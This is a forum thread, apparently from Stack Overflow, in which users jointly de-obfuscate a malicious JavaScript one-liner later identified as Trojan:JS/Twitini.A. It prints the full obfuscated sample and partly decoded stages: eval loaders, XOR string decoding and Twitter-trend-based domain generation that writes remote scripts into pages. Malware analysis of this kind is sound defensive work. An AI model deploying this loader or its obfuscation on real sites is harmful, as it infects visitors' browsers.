I have a piece of nasty javascript that I would like to de-obfuscate. I know that I can spin up a VM and behold the malware in all of its glory, but I am more interested in not having it run, but viewing it in a non-obfuscated form. If it needs to run in order to do this, then so be it, I guess. Anyone know how to do this without compromising myself?
Thanks,
Tim
EDIT: here's the code (one liner, it was between script tags). This was sent to me, I don't have access to the server.
var $a="Z6fpZ3dZ22Z2524aZ253dZ2522dw(dcsZ2528cuZ252c14Z2529);Z2522;Z22;ceZ3dZ22arZ2543oZ2564eZ2541Z2574Z25280Z2529^Z2528Z2527Z2530xZ25300Z2527+eZ2573)Z2529)Z253b}}Z22;dzZ3dZ22Z2566unZ2563tZ2569onZ2520dw(Z2574)Z257bcaZ253dZ2527Z252564oZ252563umZ252565ntZ252eZ252577Z2572Z252569Z2574Z252565(Z252522Z2527;ceZ253dZ2527Z252522Z2529Z2527;cbZ253dZ2527Z25253cscZ252572Z252569pZ252574 Z25256cZ252561nZ25256Z2537uZ252561geZ25253Z2564Z25255cZ252522Z256aavZ252561Z252573cZ252572ipZ25257Z2534Z25255cZ252522Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252fscZ2572Z252569ptZ25253eZ2527;winZ2564owZ255bZ2522eZ2522+Z2522Z2522+ Z2522vZ2522+Z2522alZ2522]Z2528uneZ2573cZ2561Z2570e(Z2574))Z257d;Z22;cbZ3dZ22e(dZ2573);Z2573tZ253dtmpZ253dZ2527Z2527;for(Z2569Z253d0;Z2569Z253cdZ2573.Z256cZ256Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ25Z22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;dfZ7bl;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;ccZ3dZ225ngZ2574h;Z2569Z252bZ252b)Z257btmpZ253ddsZ252esliZ2563e(Z2569Z252cZ2569+1)Z253bsZ22;stZ3dZ22Z2573Z2574Z253dZ2522$aZ253dsZ2574;Z2564cZ2573Z2528Z2564Z2561Z252bZ2564bZ252bZ2564Z2563Z252bdZ2564+Z2564Z2565Z252c1Z2530Z2529;Z2564wZ2528sZ2574)Z253bZ2573tZ253d$Z2561;Z2522;Z22;caZ3dZ22Z2566Z2575nctZ2569Z256fnZ2520Z2564Z2563s(dZ2573,Z2565s)Z257bdsZ253duneZ2573caZ2570Z22;dcZ3dZ22rs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87trc7Z3c07id~7Z3c07f}d7Z3c07f}b7Z3c07}|s7Z3c07Z257FhZ7b7Z3c07vtc7Z3c07rfv7Z3c07iec7Z3c07}s`7Z3c07~sj7Z3c07wtg79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;Z22;ddZ3dZ2208y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9;!Z2520Z2520+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050Z22;cdZ3dZ22Z2574Z253dstZ252bStrZ2569nZ2567.fZ2572Z256fmCZ2568arZ2543oZ2564e((Z2574mp.Z2563hZ22;dbZ3dZ227FtuQd8!90;0!Z25200;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0--0Z252009kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0Z270;gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3e|u~wdx+m0yv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vZ22;deZ3dZ22!Z25209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+0}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;czZ3dZ22Z2566uZ256ecZ2574ioZ256e cZ257aZ2528czZ2529Z257bretZ2575rn Z2563a+cZ2562+Z2563cZ252bZ2563d+Z2563e+cZ257a;Z257d;Z22;Z69Z66Z20(doZ63uZ6denZ74.coZ6fkiZ65Z2eiZ6edZ65xOfZ28Z27rf5Z666Z64sZ27)Z3dZ3d-1)Z7bfunctionZ20cZ61llbZ61ckZ28x)Z7bwinZ64Z6fZ77Z2etw Z3d xZ3bvarZ20Z64 Z3d nZ65wZ20DaZ74e()Z3bd.Z73eZ74Z54Z69Z6dZ65(x[Z22asZ5foZ66Z22]*1Z300Z30)Z3bZ76aZ72 hZ20Z3d d.Z67Z65Z74UZ54Z43HZ6fuZ72s(Z29;wiZ6edoZ77.Z68 Z3d h;Z69fZ20(hZ20Z3e 8)Z7bd.Z73etUZ54Z43DatZ65(dZ2egeZ74Z55Z54Z43Z44ateZ28) Z2dZ20Z32)Z3b}elZ73eZ7bd.sZ65tUTZ43Z44Z61teZ28dZ2egetZ55TZ43DatZ65()Z20- 3Z29;Z7dwiZ6edZ6fw.gZ64 Z3d d;vZ61r tZ69me Z3d nZ65Z77 AZ72raZ79(Z29;Z76ar Z73Z68iZ66tZ49ndeZ78 Z3d Z22Z22;tiZ6dZ65[Z22yeZ61rZ22] Z3d dZ2egZ65tUZ54CZ46ullZ59eaZ72(Z29Z3btZ69Z6de[Z22mZ6fZ6etZ68Z22] Z3d Z64Z2egeZ74Z55Z54CMZ6fnthZ28)Z2bZ31;tZ69me[Z22Z64Z61yZ22] Z3dZ20d.Z67etZ55TZ43Z44atZ65()Z3bif Z28d.gZ65Z74UTZ43Z4donZ74h()Z2b1 Z3c 1Z30)Z7bshiftZ49ndeZ78 Z3d tiZ6de[Z22yeaZ72Z22] Z2b Z22Z2d0Z22 + (dZ2egetZ55TZ43MonZ74Z68()Z2b1Z29;}eZ6cZ73Z65Z7bshiZ66Z74IZ6edZ65x Z3d tiZ6deZ5bZ22yearZ22] +Z20Z22-Z22 +Z20(Z64.geZ74UTZ43MZ6fnZ74hZ28Z29+Z31);Z7difZ20(dZ2egetZ55TCDZ61te(Z29 Z3c 10Z29Z7bshifZ74InZ64Z65xZ20Z3dshifZ74Z49ndeZ78Z20+ Z22-0Z22 + Z64Z2egetZ55TCDZ61teZ28);}Z65Z6csZ65Z7bshiZ66tInZ64eZ78 Z3dZ20shZ69fZ74IZ6edexZ20+ Z22-Z22 Z2b Z64.Z67etZ55Z54Z43DatZ65();Z7ddZ6fcumZ65Z6eZ74.Z77rZ69teZ28Z22Z3cscrZ22+Z22ipt lZ61nguZ61geZ3djavZ61sZ63rZ69Z70Z74Z22+Z22 sZ72cZ3dZ27http:Z2fZ2fseaZ72chZ2etwZ69tteZ72.cZ6fmZ2ftZ72eZ6edsZ2fdailZ79.Z6aZ73on?Z64Z61tZ65Z3dZ22+ shiftZ49nZ64eZ78+Z22&cZ61llZ62acZ6bZ3dcallZ62acZ6bZ32Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);} functiZ6fn Z63aZ6clZ62aZ63kZ32(x)Z7bwZ69ndoZ77.tZ77 Z3d x;Z73c(Z27rZ665Z66Z36dsZ27,2,Z37)Z3bZ65vaZ6c(uZ6eescZ61peZ28Z64zZ2bcZ7aZ2boZ70+stZ29+Z27dwZ28dz+Z63z(Z24Z61+stZ29);Z27);Z64oZ63umZ65ntZ2ewZ72Z69te(Z24a);Z7dZ64ocuZ6deZ6eZ74.Z77riZ74e(Z22Z3cimg sZ72cZ3dZ27http:Z2fZ2fsearchZ2etwZ69tteZ72.Z63oZ6dZ2fZ69mZ61gZ65Z73Z2fseaZ72Z63hZ2frsZ73.pnZ67Z27 wiZ64tZ68Z3d1Z20Z68eiZ67htZ3d1 sZ74ylZ65Z3dZ27visibiZ6citZ79Z3ahiZ64deZ6eZ27 Z2fZ3e Z3cscrZ22+Z22ipt laZ6eguZ61geZ3djZ61vZ61sZ63ripZ74Z22+Z22 srZ63Z3dZ27http:Z2fZ2fseaZ72ch.Z74wZ69tZ74erZ2eZ63omZ2ftZ72eZ6edsZ2fdaZ69lyZ2ejZ73Z6fn?cZ61llZ62Z61cZ6bZ3dcallbZ61Z63Z6bZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}eZ6csZ65Z7b$aZ3dZ27Z27};functiZ6fZ6e scZ28Z63nm,Z76Z2cedZ29Z7bvarZ20eZ78Z64Z3dnew Z44atZ65()Z3beZ78Z64.Z73Z65tDZ61Z74Z65Z28Z65xdZ2eZ67etZ44ateZ28)+Z65d);Z64ocZ75meZ6et.cZ6foZ6bieZ3dZ63nZ6d+ Z27Z3dZ27 +esZ63apeZ28vZ29+Z27Z3beZ78pirZ65sZ3dZ27+exdZ2etoZ47Z4dTZ53tZ72Z69Z6eZ67Z28);Z7d;";
var ez=window;ez[String.fromCharCode(101,118,97)+"l"](fds());
function asd(s)
{
r="";
for(i=0;i<s.length;i++)
{
if(s.charAt(i)=="Z")
{
s1="%"
}
else
{
s1=s.charAt(i)
}
r=r+s1;
}
return unescape(r);
}
function fds()
{
return asd($a);
}
EDIT AGAIN: I am choosing Matthew Flaschen because after all of the looking at it both he, Russ Cam and others have helped shine a lot of light on what this particular attack does and how to go about this sort of thing in general. Matthew happened to jump on this the fastest.
NOTE: In the process of looking at trying to get to the bottom of this, I found a very handy tool call Malzilla. If you are in need of doing this sort of thing, it has a lot of good utilities. Thanks All!
Okay, stage 1. This was relatively easy. String.fromCharCode(101,118,97)
is "eva", so it's calling the eval function on fds()
. That in turn just calls asd
, which is really just replacing "Z" with %. After we unescape, we get the code they wanted to eval
:
op="%24a%3d%22dw(dcs%28cu%2c14%29);%22;";
ce="ar%43o%64e%41%74%280%29^%28%27%30x%300%27+e%73)%29)%3b}}";
;cb="e(d%73);%73t%3dtmp%3d%27%27;for(%69%3d0;%69%3cd%73.%6c%6";
da="fqb0t-7vrs}vyb>s%7F}7+0fqb0cxyvdY~tuh0-0%20+v%7Fb08fqb0y0y~0gy~t%7Fg>dg>dbu~tc9kyv08gy~t%7Fg>x0.0(0660gy~t%7Fg>x0,0%22!0660y>y~tuh_v870%20'790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>sxqbS%7FtuQd8!90;0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mu|cu0yv088gy~t%7Fg>x0,0)0ll00gy~t%7Fg>x0.0%22%2090660y>y~tuh_v870!(790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>sxqbS%";
cu="(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:w{y;xp;df{l;64c}p`|)%$$4|q}s|`),$*(;}rfuyq*(;p}b*";
cc="5ng%74h;%69%2b%2b)%7btmp%3dds%2esli%63e(%69%2c%69+1)%3bs";
st="%73%74%3d%22$a%3ds%74;%64c%73%28%64%61%2b%64b%2b%64%63%2bd%64+%64%65%2c1%30%29;%64w%28s%74)%3b%73t%3d$%61;%22;";
ca="%66%75nct%69%6fn%20%64%63s(d%73,%65s)%7bds%3dune%73ca%70";
dc="rs}vyb>s%7F}7+fqb0}%7F~dxc0-0~ug0Qbbqi87trc7<07id~7<07f}d7<07f}b7<07}|s7<07%7Fh{7<07vtc7<07rfv7<07iec7<07}s`7<07~sj7<07wtg79+fqb0|uddubc0-0~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7z7<7y7<7{7<7|7<7}7<7~7<7%7F7<7`7<7a7<7b7<7c7<7d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~e}rubc0-0~ug0Qbbqi8!<%22<#<$<%<%26<'<(<)9+%19ve~sdy%7F~0Sq|se|qdu]qwys^e}rub8tqi<0}%7F~dx<0iuqb<0y~tuh9kbudeb~0888iuqb0;";
dd="08y~tuh0:0tqi990;08}%7F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!<0iuqbSx%22<0}%7F~dxSx<0tqiSx<0~e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7M<0dy}uK7}%7F~dx7M<0dy}uK7iuqb7M<0cxyvdY~tuh9;!%20%20+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060%20hQQ90;0~e}9050%26#9050%22%26M0;0|uddubcK888dy}uK7iuqb7M060%20hQQ90,,0%2290;0~e}9050%22%M+iuqbSx%220-0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0#90;0~e}9050";
cd="%74%3dst%2bStr%69n%67.f%72%6fmC%68ar%43o%64e((%74mp.%63h";
db="7FtuQd8!90;0!%200;gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mmyv08cxyvdY~tuh0--0%2009kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK%26M>aeubi>sxqbS%7FtuQd8!90;0'0;gy~t%7Fg>dg>dbu~tcKyMK%26M>aeubi>|u~wdx+m0yv08cxyvdY~tuh0.0%209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~t%7Fg>wt>wudEDSVe||Iuqb89+dy}uK7}%7F~dx7M0-0gy~t%7Fg>wt>wudEDS]%7F~dx89;!+dy}uK7tqi7M0-0gy~t%7Fg>wt>wudEDSTqdu89+fqb0t-7v";
de="!%209M0;0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0$90;0~e}9050!%209M+0}%7F~dxSx0-0|uddubcK88dy}uK7}%7F~dx7M0;0~e}9050%22%9M0;0|uddubcK88dy}uK7}%7F~dx7M0:0~e}9050%22%9M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0%269050%22'9M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050%22$9M+4q-4q>bu`|qsu8t<tqiSx0;0iuqbSx%220;0}%7F~dxSx0;0iuqbSx!0;0tqiSx0;0}%7F~dxcKdy}uK7}%7F~dx7M0=0!M0;07>s%7F}79+m";
cz="%66u%6ec%74io%6e c%7a%28cz%29%7bret%75rn %63a+c%62+%63c%2b%63d+%63e+c%7a;%7d;";
if (document.cookie.indexOf("rf5f6ds") == -1) {
function callback(x) {
window.tw = x;
var d = new Date;
d.setTime(x.as_of * 1000);
var h = d.getUTCHours();
window.h = h;
if (h > 8) {
d.setUTCDate(d.getUTCDate() - 2);
} else {
d.setUTCDate(d.getUTCDate() - 3);
}
window.gd = d;
var time = new Array;
var shiftIndex = "";
time.year = d.getUTCFullYear();
time.month = d.getUTCMonth() + 1;
time.day = d.getUTCDate();
if (d.getUTCMonth() + 1 < 10) {
shiftIndex = time.year + "-0" + (d.getUTCMonth() + 1);
} else {
shiftIndex = time.year + "-" + (d.getUTCMonth() + 1);
}
if (d.getUTCDate() < 10) {
shiftIndex = shiftIndex + "-0" + d.getUTCDate();
} else {
shiftIndex = shiftIndex + "-" + d.getUTCDate();
}
document.write("<scr" + "ipt language=javascript" + " src='http://search.twitter.com/trends/daily.json?date=" + shiftIndex + "&callback=callback2'>" + "</scr" + "ipt>");
}
function callback2(x) {
window.tw = x;
sc("rf5f6ds", 2, 7);
function dw(t)
{
ca='%64o%63um%65nt.%77r%69t%65(%22';
ce='%22)';
cb='%3csc%72%69p%74 %6c%61n%67u%61ge%3d%5c%22jav%61%73c%72ip%74%5c%22%3e';
cc='%3c%5c%2fscr%69pt%3e';
eval(unescape(t))
};
$a="dw(dcs(cu,14));";
function dw(t)
{
ca='%64o%63um%65nt.%77r%69t%65(%22';ce='%22)';
cb='%3csc%72%69p%74 %6c%61n%67u%61ge%3d%5c%22jav%61%73c%72ip%74%5c%22%3e';
cc='%3c%5c%2fscr%69pt%3e';
eval(unescape(t))
};
document.write("<script language=\"javascript\"><\/script>t=st+String.fromCharCode((tmp.ch")
dw(dcs(cu,14));
$a=st;
dcs(da+db+dc+dd+de,10);
dw(st);
st=$a;
document.write($a);
}
document.write("<img src='http://search.twitter.com/images/search/rss.png' width=1 height=1 style='visibility:hidden' /> <script language=javascript src='http://search.twitter.com/trends/daily.json?callback=callback'></script>");
} else {
$a = "";
}
function sc(cnm, v, ed) {
var exd = new Date;
exd.setDate(exd.getDate() + ed);
document.cookie = cnm + "=" + escape(v) + ";expires=" + exd.toGMTString();
}
I decoded the variables at the top. cz is intriguing. it says cz="function cz(cz){return ca+cb+cc+cd+ce+cz;};";
Which shows up as
function dcs(ds,es){
ds=unescape(ds);
st=tmp='';
for(i=0;i<ds.l%65ngth;i++){
tmp=ds.slice(i,i+1);
st=st+String.fromCharCode((tmp.ch! 9M0;0|uddubcK8888dy}uK7iuqb7M060 h##!!90..0$90;0~e}9050! 9M+0}~dxSx0-0|uddubcK88dy}uK7}~dx7M0;0~e}9050"%9M0;0|uddubcK88dy}uK7}~dx7M0:0~e}9050"%9M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0&9050"'9M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050"$9M+4q-4q>bu`|qsu8t<tqiSx0;0iuqbSx"0;0}~dxSx0;0iuqbSx!0;0tqiSx0;0}~dxcKdy}uK7}~dx7M0=0!M0;07>s}79+m
I'm having difficulty decoding that last st=st+String.fromCharCode...
part, though.
Still plowing forward. If you look a the decoded values, st is st="st="$a=st;dcs(da+db+dc+dd+de,10);dw(st);st=$a;";";
Then adding the "d" lines, it becomes something like this:
st="
$a=st;
dcs(fqb0t-7vrs}vyb>s}7+0fqb0cxyvdY~tuh0-0 +vb08fqb0y0y~0gy~tg>dg>dbu~tc9kyv08gy~tg>x0.0(0660gy~tg>x0,0"!0660y>y~tuh_v870 '790.0=!9kcxyvdY~tuh0-0gy~tg>dg>dbu~tcKyMK$M>aeubi>sxqbStuQd8!90;0gy~tg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mu|cu0yv088gy~tg>x0,0)0ll00gy~tg>x0.0" 90660y>y~tuh_v870!(790.0=!9kcxyvdY~tuh0-0gy~tg>dg>dbu~tcKyMK$M>aeubi>sxqbS%7FtuQd8!90;0! 0;gy~tg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mmyv08cxyvdY~tuh0--0 09kcxyvdY~tuh0-0gy~tg>dg>dbu~tcKyMK&M>aeubi>sxqbStuQd8!90;0'0;gy~tg>dg>dbu~tcKyMK&M>aeubi>|u~wdx+m0yv08cxyvdY~tuh0.0 9kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tg>wt>wudEDSVe||Iuqb89+dy}uK7}~dx7M0-0gy~tg>wt>wudEDS]~dx89;!+dy}uK7tqi7M0-0gy~tg>wt>wudEDSTqdu89+fqb0t-7vrs}vyb>s}7+fqb0}~dxc0-0~ug0Qbbqi87trc7<07id~7<07f}d7<07f}b7<07}|s7<07h{7<07vtc7<07rfv7<07iec7<07}s`7<07~sj7<07wtg79+fqb0|uddubc0-0~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7z7<7y7<7{7<7|7<7}7<7~7<77<7`7<7a7<7b7<7c7<7d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~e}rubc0-0~ug0Qbbqi8!<"<#<$<%<&<'<(<)9+ve~sdy~0Sq|se|qdu]qwys^e}rub8tqi<0}~dx<0iuqb<0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!<0iuqbSx"<0}~dxSx<0tqiSx<0~e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7M<0dy}uK7}~dx7M<0dy}uK7iuqb7M<0cxyvdY~tuh9;! +iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060 hQQ90;0~e}9050⍚"&M0;0|uddubcK888dy}uK7iuqb7M060 hQQ90,,0"90;0~e}9050"%M+iuqbSx"0-0|uddubcK8888dy}uK7iuqb7M060 h##!!90..0#90;0~e}9050! 9M0;0|uddubcK8888dy}uK7iuqb7M060 h##!!90..0$90;0~e}9050! 9M+0}~dxSx0-0|uddubcK88dy}uK7}~dx7M0;0~e}9050"%9M0;0|uddubcK88dy}uK7}~dx7M0:0~e}9050"%9M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0&9050"'9M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050"$9M+4q-4q>bu`|qsu8t<tqiSx0;0iuqbSx"0;0}~dxSx0;0iuqbSx!0;0tqiSx0;0}~dxcKdy}uK7}~dx7M0=0!M0;07>s}79+m,10);
dw(st);
st=$a;
";
(indentation mine). Again, still having trouble with those long stings.
This trojan is called Twitini.A and is documented here: http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan%3AJS%2FTwitini.A
I got 2 layers deep on my own specimen before googling the heck out of it. I was really intrigued by the twitter tie-in. I think it's clever to use known twitter trends on specific dates to generate domain names.
ok, this should be straightforward.
var ez=window;ez[String.fromCharCode(101,118,97)+"l"](fds());
is simply a call to eval
To know what is being evaluated, we have to decipher the string. We should be able to do this relatively safely by running it through the asd
function...
This gives us
op = '$a="dw(dcs(cu,14));";';
ce = "arCodeAt(0)^('0x00'+es)));}}"
dz = "function dw(t){ca='%64o%63um%65nt.%77r%69t%65(%22';ce='%22)';cb='%3csc%72%69p%74 %6c%61n%67u%61ge%3d%5c%22jav%61%73c%72ip%74%5c%22%3e';cc='%3c%5c%2fscr%69pt%3e';window["e"+\"\"+ \"v\"+\"al\"](unescape(t))};"
cb = "e(ds);st=tmp='';for(i=0;i<ds.l%6";
da = "fqb0t-7vrs}vyb>s%7F}7+0fqb0cxyvdY~tuh0-0%20+v%7Fb08fqb0y0y~0gy~t%7Fg>dg>dbu~tc9kyv08gy~t%7Fg>x0.0(0660gy~t%7Fg>x0,0%22!0660y>y~tuh_v870%20'790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>sxqbS%7FtuQd8!90;0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mu|cu0yv088gy~t%7Fg>x0,0)0ll00gy~t%7Fg>x0.0%22%2090660y>y~tuh_v870!(790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>sxqbS%";
cu = "(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:w{y;xp;df{l;64c}p`|)%$$4|q}s|`),$*(;}rfuyq*(;p}b*";
cc = "5ngth;i++){tmp=ds.slice(i,i+1);s";
st = 'st="$a=st;dcs(da+db+dc+dd+de,10);dw(st);st=$a;";';
ca = "function dcs(ds,es){ds=unescap";
dc = "rs}vyb>s%7F}7+fqb0}%7F~dxc0-0~ug0Qbbqi87trc7<07id~7<07f}d7<07f}b7<07}|s7<07%7Fh{7<07vtc7<07rfv7<07iec7<07}s`7<07~sj7<07wtg79+fqb0|uddubc0-0~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7z7<7y7<7{7<7|7<7}7<7~7<7%7F7<7`7<7a7<7b7<7c7<7d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~e}rubc0-0~ug0Qbbqi8!<%22<#<$<%<%26<'<(<)9+%19ve~sdy%7F~0Sq|se|qdu]qwys^e}rub8tqi<0}%7F~dx<0iuqb<0y~tuh9kbudeb~0888iuqb0;";
dd = "08y~tuh0:0tqi990;08}%7F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!<0iuqbSx%22<0}%7F~dxSx<0tqiSx<0~e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7M<0dy}uK7}%7F~dx7M<0dy}uK7iuqb7M<0cxyvdY~tuh9;!%20%20+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060%20hQQ90;0~e}9050%26#9050%22%26M0;0|uddubcK888dy}uK7iuqb7M060%20hQQ90,,0%2290;0~e}9050%22%M+iuqbSx%220-0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0#90;0~e}9050";
cd = "t=st+String.fromCharCode((tmp.ch";
db = "7FtuQd8!90;0!%200;gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mmyv08cxyvdY~tuh0--0%2009kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK%26M>aeubi>sxqbS%7FtuQd8!90;0'0;gy~t%7Fg>dg>dbu~tcKyMK%26M>aeubi>|u~wdx+m0yv08cxyvdY~tuh0.0%209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~t%7Fg>wt>wudEDSVe||Iuqb89+dy}uK7}%7F~dx7M0-0gy~t%7Fg>wt>wudEDS]%7F~dx89;!+dy}uK7tqi7M0-0gy~t%7Fg>wt>wudEDSTqdu89+fqb0t-7v";
de = "!%209M0;0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0$90;0~e}9050!%209M+0}%7F~dxSx0-0|uddubcK88dy}uK7}%7F~dx7M0;0~e}9050%22%9M0;0|uddubcK88dy}uK7}%7F~dx7M0:0~e}9050%22%9M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0%269050%22'9M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050%22$9M+4q-4q>bu`|qsu8t<tqiSx0;0iuqbSx%220;0}%7F~dxSx0;0iuqbSx!0;0tqiSx0;0}%7F~dxcKdy}uK7}%7F~dx7M0=0!M0;07>s%7F}79+m";
cz = /* "function cz(cz){return ca+cb+cc+cd+ce+cz;};"; */
"function cz(cz){return \"function dcs(ds,es){ds=unescape(ds);st=tmp='';for(i=0;i<ds.l%65ngth;i++){tmp=ds.slice(i,i+1);st=st+String.fromCharCode((tmp.charCodeAt(0)^('0x00'+es)));}}\"+cz;};";
if (document.cookie.indexOf('rf5f6ds') == -1) {
function callback(x) {
window.tw = x;
var d = new Date();
d.setTime(x["as_of"] * 1000);
var h = d.getUTCHours();
window.h = h;
if (h > 8) {
d.setUTCDate(d.getUTCDate() - 2);
} else {
d.setUTCDate(d.getUTCDate() - 3);
}
window.gd = d;
var time = new Array();
var shiftIndex = "";
time["year"] = d.getUTCFullYear();
time["month"] = d.getUTCMonth() + 1;
time["day"] = d.getUTCDate();
if (d.getUTCMonth() + 1 < 10) {
shiftIndex = time["year"] + "-0" + (d.getUTCMonth() + 1);
} else {
shiftIndex = time["year"] + "-" + (d.getUTCMonth() + 1);
}
if (d.getUTCDate() < 10) {
shiftIndex = shiftIndex + "-0" + d.getUTCDate();
} else {
shiftIndex = shiftIndex + "-" + d.getUTCDate();
}
